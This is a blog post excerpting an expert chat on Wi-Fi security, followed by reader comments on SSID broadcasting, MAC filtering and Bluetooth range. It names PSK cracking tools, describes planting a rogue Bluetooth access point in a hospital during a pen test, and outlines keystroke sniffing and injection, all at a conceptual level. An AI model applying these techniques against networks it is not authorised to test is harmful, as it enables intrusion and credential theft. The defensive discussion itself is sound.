Wi-Fi

Wi-Fi Security is always one step behind


Maintaining security is the irresolvable angst that all network—wired and wireless—administrators feel. So why focus on Wi-Fi security? To explain, I wanted to highlight a very interesting chat transcript about wireless security on NetworkWorld. The chat features an electronic hero/mentor of mine and renowned wireless security expert, Joshua Wright. The fact that he authored a SANS course “Assessing and Securing Wireless Networks” provides insight into his abilities. I would like to think that I share his unique sense of humor and fondness for sushi as professed in the name of his website: “willhackforsushi.com”.

The chat entertained many great questions and the NetworkWorld moderators; in particular Julie Bort did an admirable job fielding the questions and presenting them to Joshua. Since the session was quite long I thought I might highlight several of the questions that hopefully will be of particular interest to the members.

Question: How secure is WPA-PSK or WPA2-PSK? Joshua Wright: PSK-based authentication mechanisms are notoriously vulnerable to offline dictionary attacks. I wrote one of the first WPA/WPA2-PSK attack tools "coWPAtty." (Get it? "coW-PAtty" -- like the cow … excrement). Newer tools such as Aircrack-ng are even faster. The main problem with PSK mechanisms is that the same shared secret is stored on all devices. I was talking to a customer who was doing handheld credit card transactions with a wireless device using WPA2-PSK. They were PCI compliant (since PCI requires WPA or all kinds of hoops with WEP), but they were vulnerable in that as devices were lost, stolen or turned in for service, the PSK was disclosed and available to anyone who could get their hands on the device. Enterprises should use 802.1X instead of PSK based authentication strategies for stronger authentication and unique, per-user keys.
Question: How should organizations address the threat of driver vulnerabilities? Joshua Wright: Since a driver vulnerability can expose a workstation to a remote compromise, and since the vulnerability is exploited in kernel space which bypasses local security mechanisms (such as privilege separation, intrusion prevention mechanisms, spyware and anti-virus tools, etc), it's a serious threat. Organizations should start by compiling a list of all the wireless drivers they have installed in their organization, and regularly check the vendor's websites for driver updates.

I've also written a tool to assist in enumerating installed drivers on Windows hosts that includes a vulnerability assessment component. The tool is called WiFiDEnum. A free tool available at http://labs.arubanetworks.com/wifidenum, WiFiDEnum scans hosts over your wired (or wireless) network and enumerates all the wireless drivers that are installed, using a local database of known vulnerabilities to let you know when you are exposed to driver threats.

I would like to add that WiFiDEnum is a very useful tool and does exactly as advertised.

Question: Is WPA2 now considered very secure and we should feel fine using it? Or are there still attacks/vulnerabilities that it's susceptible to? Joshua Wright: WPA2 provides strong encryption, and specifies strong authentication mechanisms such as PEAP, TTLS and EAP/TLS as well, so it is a strong strategy for organizations. The common problem with these implementations is when people misconfigure client settings for PEAP and TTLS, like I discussed with Brad Antoniewicz from Foundstone at Shmoocon a few weeks ago (slides at www.willhackforsushi.com, the video will be up at shmoocon.org shortly). If PEAP and TTLS aren't configured properly, an attacker can impersonate your RADIUS server and get access to the victim's inner authentication credentials, possibly disclosing the user's password, or giving the attacker access to the user's MS-CHAP challenge response, which is almost as good.
Question: Joshua, please let me know your thoughts on disabling broadcasting your router's SSID. Joshua Wright: It's a bad idea. I know the PCI specification requires you to do this, and I've told them they need to remove this requirement from the specification. Imagine you are a government base and you don't tell your agents where you are located. They have to walk around and keep asking "Are you the government base?" to everyone the meet. Eventually, some wily hacker or bad guy will say "Heck YEAH I'm your base, come on in and share your secrets with me." This is essentially what happens with SSID cloaking, where you have to ask every AP you meet if their desired SSID is available, allowing an attacker to impersonate your SSID at the airport, coffee shop, in the airplane, etc. In short, don't cloak your SSID, but don't make your SSID something like "sexyhackertargethere" either.

I especially wanted to highlight this question and answer after having several rather lengthy discussions on the forum about this very subject. In addition to the increased management overhead and control problems that “not advertising the SSID” causes, the additional vulnerability mentioned by Joshua is a new twist that adds even more ammunition to my debate arsenal.

Question: What new risks do you see regarding Bluetooth access points? Joshua Wright: Bluetooth APs are problematic for organizations because they can offer the same range of 802.11b/g APs, but cannot be detected by 802.11 WIDS systems. This allows an attacker to introduce a rogue to your network, and escape detection by the WIDS system. This is something I used at a hospital a while back, where I faked "stomach pain" and plugged a Bluetooth AP into the waiting room electrical and RF45 LAN jack. I used it to hack the hospital for a few weeks from the parking lot across the street until my connection disappeared. At the penetration test wrap-up, I asked for my Bluetooth AP back, and I got blank stares from the security team. Them: "What AP?" Me: "The AP I hid in the waiting room." Them: "We never found an AP." Yeah, SOMEONE STOLE MY AP!

I can personally attest to the effectiveness of this attack venue and how far “under the radar” this pen method is.

Question: Can you explain some of the exploits available that can attack wireless mice and keyboards? Joshua Wright: At the Blackhat Federal conference last week, Max Moser demonstrated attacks against 27 MHz keyboards and mice, where he is able to remotely capture and "decrypt" keystrokes and mouse positions. I use the phrase "decrypt" lightly, since as Max discovered, these devices often use only an XOR mechanism to protect data with a 16-bit "key." With this capability, it is possible to create a remote, undetectable keystroke logger, which can record every keystroke entered by the user. Further, it appears possible to inject arbitrary keystrokes as well. Max points out that WinKey + R (opening the Run dialog box) could be particularly useful for an attacker trying to compromise a system.

This shows once again how “thinking outside of the box” is able to create a new attack avenue.

Question: If KARMA was the scariest wireless attack of 2006/2007, what's scariest for 2008 and beyond? Joshua Wright: Well, I think attacking PEAP networks is pretty scary, but I'm a little biased. I am nervous about wireless driver attacks, and I think we're only starting to see the beginning of this attack trend (best noted by commercial vendors selling products for LOTS of money to test your drivers for you).
Question: What makes attacking PEAP networks so scary? Joshua Wright: If I compromise your authentication credentials from PEAP, then I have your username and password, likely, your MS Windows domain username and password. That also gives me access to your domain servers, Outlook, file servers, MS SQL, Sharepoint, etc. I think that's kinda scary, don't you?
Final thoughts

I hopefully pointed out some of the more interesting comments. If at all predisposed, please read the entire transcript. It is well worth the time required.

About

Information is my field...Writing is my passion...Coupling the two is my mission.

43 comments
Michael Kassner
Michael Kassner

I have emailed Joshua and hopefully he will let us know what the status is of WiFiDEnum.

ITSuper
ITSuper

Unable to get the link to work. It was a nice thought, though.

Dicac
Dicac

They have pulled the wifidenum files from the site. What now?

CEdwards478
CEdwards478

does anyone have a link to the WiFiDEnum application? the one in the article doesn't seem to be valid anymore...thanks

w2ktechman
w2ktechman

First to mention I would doubt that a large enterprise or mid to large business would be using WPA\WPA2. WPA/WPA2 is more for small companies and/or home use. As for ssid broadcasting, that is a good reason to have ssid broadcasting instead of hidden. However I disagree with it's usefulness for many companies. If someone were phishing for credit cards, etc. they might be more inclined to connect to 'linksys' or the like which would draw in many more people (unless a convention for a specific co. were there). Also keep in mind that the ones who use the default ssid are very likely to not pay much attention to wifi security at all, and are more likely to use wireless for banking, etc. at an airport, etc.. Interesting about the BT AP's. I now need to do a bit of looking up (for personal interest). Yes, I recommend not using wireless keyboards/mice in an office. However, every time I read something else about them (such as this) it seems that using them at home is just as bad an idea. Glad I broke mine (keyboard meets concrete) over a year ago. Yes, I have marked this article to come back and reference later when time is more avail. I want to hit up the links provided. Thanks Again Michael!

Michael Kassner
Michael Kassner

Joshua Wright is pretty savvy when it comes to wireless security. Do you agree with his assessment of the newest security threats and attack avenues?

george.jenkins
george.jenkins

What is the range for a wireless keyboard/mouse signal? Also, the article referenced BT AP's; I thought BT had a short signal range.

Michael Kassner
Michael Kassner

I consider your comments to be valuable insight and I appreciate them.

seanferd
seanferd

I had not heard that not broadcasting SSID is a vulnerability, usually, I hear the opposite. I really appreciate that particular bit of information. I have not the knowledge to agree or disagree as to what the newest security issues might be, but I'll be sure to find out what Joshua Wright has to say from now on. I do believe I've run across his site before, doing wireless home router research. Had you posted a link there previously? Now, let's see about those links...

cmyers
cmyers

Now that link worked for me! I tried some of the others again, still without success. Very strange...

CEdwards478
CEdwards478

Thanks, but even with those links I keep getting: "We?re sorry, but the Web page you requested is unavailable. It is possible that the page may no longer exist or is simply not found. Please choose from the links on the right, which we hope will help you find what you?re looking for or Contact Aruba for further assistance

Michael Kassner
Michael Kassner

I thought I would add a few comments about the ability to receive BlueTooth signals. I remember DefCon 2K4 where the first BlueSniper rifle was introduced and had to build one myself. It was pretty amazing, I was able to link up to a target approximately 100yds away. I thought I would link to SmallNet Builder (best source for anything like this) as they have an even better design for a BlueSniper rifle. http://www.smallnetbuilder.com/content/view/24256/98/

robo_dev
robo_dev

Versus typically a 30mW-100mW or higher power used for 802.11b and it's variants (subject to each country's local laws) 1mW typically limits it to about 30 feet, but with the appropriate receive antenna, much more distance can be possible. Do a google search on 'blue sniper'. Since BlueTooth does not use ethernet as it's basis, hacking it is more technically complicated. While I have not seen exploits of bluetooth keyboards, a hack of this sort would be very very bad. Bluetooth security analysis http://www.securityfocus.com/infocus/1830

The Scummy One
The Scummy One

BT has been known (from my understanding) to be good up to 1/2 mile. However, that is in really good conditions. Normally, BT would be a very short distance, however it can still cause interference with other wireless technologies.

Michael Kassner
Michael Kassner

I have been in countless debates about the pros and cons of SSID broadcasting and ultimately it is very dependent on the network topology. For example, not broadcasting the SSID on a MS AD network is just like asking for trouble. All sorts of weird behavior results. The other thing that I do not like about not broadcasting the SSID is the huge increase in network management traffic that results from all the STA's trying to find the controlling AP. For proof, just start up a packet sniffer and test both ways.

CEdwards478
CEdwards478

For me, it was not that Google wasn't turning up search results. It was the search on Aruba Network's site that turned up no results. All links are working for me, and the website layout/interface is entirely different from a few days ago when I couldnt access it...this is leading me to believe I was correct that they were moving(or updating) their website and my DNS servers were sending me to the old location that did no longer had the content available.

seanferd
seanferd

I still have no problem accessing the site, file download, or any of the search results for things related to WiFiDeNum or Aruba. I am puzzled by their inability to access such. My only guess is that there is some filtering going on somewhere.

Michael Kassner
Michael Kassner

NeonSamuai, I would be interested if you have the time. I am pretty sure Joshua will get back to me with information about the application. Maybe it has some issues and was pulled so as to not create any problems.

Neon Samurai
Neon Samurai

I can dig out the article if it is of interest. There is a form Google provides to request removal from there listings. If the program links where cut off and hosts wanted to remove all references, they could have filled out the request. I'm not sure if other search engines provide similar services. The idea that such a program would be pulled and links cut is disappointing and somewhat irrational being that there are so many other programs that do the same thing.

CEdwards478
CEdwards478

they were in the middle of moving their web servers, and some of us are resolving the old IP, and some the new...and one of them doesn't have the content anymore. especially because more people below are saying they can't get the file.

cmyers
cmyers

That link did not work for me. I'll bet it didn't for CEdwards478, either. Very very strange...

w2ktechman
w2ktechman

IE7, Opera, and Safari with no issues (except in Opera it wanted me to enable a plug in).

CEdwards478
CEdwards478

same for me regarding searching for it and trying multiple browsers. I submitted a comment to Aruba's Web Site team to see if they have any suggestions. It's not being blocked locally, because I administer all of our Firewalls/Content Filters, and there is nothing turning up in the logs.

cmyers
cmyers

I'm at a different organization and I'm getting the same message. Besides, if it was blocked, we'd not get anything from the Aruba Site or we should be served the "Content Blocked" message from our filter devices. It's not the browser, either, because I got the same result in IE7 and FF2.0 Also, when I type wifidenum in the search, it doesn't find anything either. Weird...

The Scummy One
The Scummy One

or something being blocked on your side, as the links worked fine for me.

Neon Samurai
Neon Samurai

I honestly don't know how open bluetooth is too sniffing but I've always avoided it like plague since the only authentication is the initial device pairing. Also, is there any encryption of the signal between two paired devices? I think the most astounding thing I've heard recently was a medical office using bluetooth to network all there computers and hardware; My first thought was wondering how many people walking down the sidewalk had already tried to pick something off the adhoc BT network. Last I read, the idea was to cause the bluetooth devices to require a repairing then you simply sniff the packets while the unsuspecting owner makes there PDA talk to there Notebook properly again. It's simply a wireless signal so someone with a little programming could even make there wifi NIC pickup bluetooth signal the same way you software mod some NICS to pick up any other RF. Guess I'm off to read that analysis you linked unless it's the same one I have sitting on my Maemo but haven't got around to reading.

manishshukla
manishshukla

Did you know there is a new cool and intimate new sushi place in Rome which offers high quality Japanese foods for eating or take-away, and offers great hand-made cakes and free wifi to all customers? http://naoko-sushi-roma.blogspot.com/

Neon Samurai
Neon Samurai

2600 Magazine, v22n1, Spring 2005, page 23 Author; Chess The article first discusses configuration and code for your html pages: < meta name="robots" content="noindex,nofollow"> include the following in robots.txt User-agent: * Disallow: / Once that is done, your website should be skipped over by any browsing bots including Google's creepy crawlers. Now that you won't fall back into the database, make the request to have existing entries removed: http://services.google.com/urlconsole/controller The article author states that he was out of the database within 12 hours but that it may take up too 24 hours. Also, it's recommended that the meta tags be used in all your html. If you only do your initial pages then any subpages of your site that are linked from other locations will be scanned. If all pages contain the meta tags then the crawler will skip your pages even if some other site directs it into a backwater page in your collection. If you want back into the listings, remove the meta tags and robots.txt and you should fall back in through the normal process next time google's creepy crawler gets too your url. http://www.google.com.gr/remove.html Google's Listing Removal Resource is listed as a source for the article. I'm not sure if this is still applicable but I don't see any reason why it wouldn't be; at least in some updated form.

JCitizen
JCitizen

Couldn't have said it better myself. Your quote: {Another axiom I subscribe to is that the "level of security should be comparable to the value of the information you are trying to protect". } Exactly the advice my clients get from me; just not said with such eloquence.

seanferd
seanferd

I was just reaching an understanding as to how not broadcasting SSID was actually a security-through-obscurity measure. Here, I am focused only on very small home networks. In the past I'd read in quite a few places that turning off broadcast would essentially "hide" a wireless connection, as in not shouting, "We're here". What I got from the article is: this doesn't matter. That is to say, a drive-by cracker can pretend to be your computer's router. Then the cracker can get into the PC, as opposed to just trying to steal an internet connection, which seems to be the focus with home wireless routers. MAC filtering is very simple in this case: allow these two or three MACs only. I don't envy those of you who manage enterprise networks. (Well, maybe I do, but not for these things!)

Neon Samurai
Neon Samurai

In my own network, I config every setting in the router because it's there and leaving a screw loose or bolt unpinned just seems downright wrong. I have less then thirty MAC to worry about though and infrequent additions or removals. I also make a hobby of security for security sake but I can recognize that and keep it within my own systems. :) The soho network in my care is similar; same router even but with a shorter and more static MAC list. Managing an enterprise wifi access point would be a whole other headacke though since the MAC count would be so much higher. I don't know if even the sharepoint appliances have an efficient process for handling MAC through batch processing.

Michael Kassner
Michael Kassner

MAC filtering in my mind is very different from "not broadcasting SSID". It is a valid security measure and it works when you consider a significant amount or users. It only loses credibility when you are trying to prevent pen testing from a skilled attacker. It is a difficult management operation when you have an enterprise wireless network, but maybe helpful for consumer or SOHO operations. Another axiom I subscribe to is that the "level of security should be comparable to the value of the information you are trying to protect". That way you have an idea as to what is sufficient and how many layers you should have in place to have a certain level of confidence. I typically view security in percentages, roughly I approximate what percentage of the available users are able to overcome a certain security measure. It seems to work as it keeps me aware of the fact that I never reach 100% security.

Neon Samurai
Neon Samurai

It's not going to stop someone from spoofing a MAC your access point recognizes but it will at least tell your AP not too listen for noise from any device it doesn't think it recognizes. If it thinks it recognizes a device, then it does the properly WPA authentication to be sure the other is not a stranger in a good MAC costume. Now, if only we could kill that "security through obscurity" myth. :)

seanferd
seanferd

"Security through obscurity." That comment definitely reinforced the idea I've taken away from this article and thread. Not broadcasting SSID doesn't mean that you've closed any door. Everything I've heard in favor of not broadcasting implies that you have effectively shut off some part of the system, disallowing any other system from fooling your PC or router into accepting it as part of the network. This is obviously not the case.

S,David
S,David

I used to set my SSID at home to not broadcast, then one day a new laptop with a built-in Intel wireless adapter found my home network anyway. After that, I figured, "why bother", as it was a PITA to deal with when friends or relatives came over with adapters that could not see the network without the broadcast.

Michael Kassner
Michael Kassner

It is interesting as I rarely think along those lines. I normally just assume that what is good for enterprise will be the best for the home network as well. I must admit that I am re-evaluating that point of view as it maybe skewed. First, I refuse to subscribe to the "security through obscurity" mantra on any level. Then after I weigh the advantages against the disadvantages of each approach, my opinion is that network efficiency is more important, especially since it is so easy to resolve what the SSID is. I wish more people would take the time to run a packet analyzer. The increase in network management traffic is quite significant.

seanferd
seanferd

I've never even considered the factors involved in a larger network environment. I'm curious as to what your take is on SSID broadcasting or not for home users, particularly those with very small networks. Especially a one wirelessly connected PC setup. For now, I'm assuming that the "Hey! I'm your base" arguement still holds up.

Editor's Picks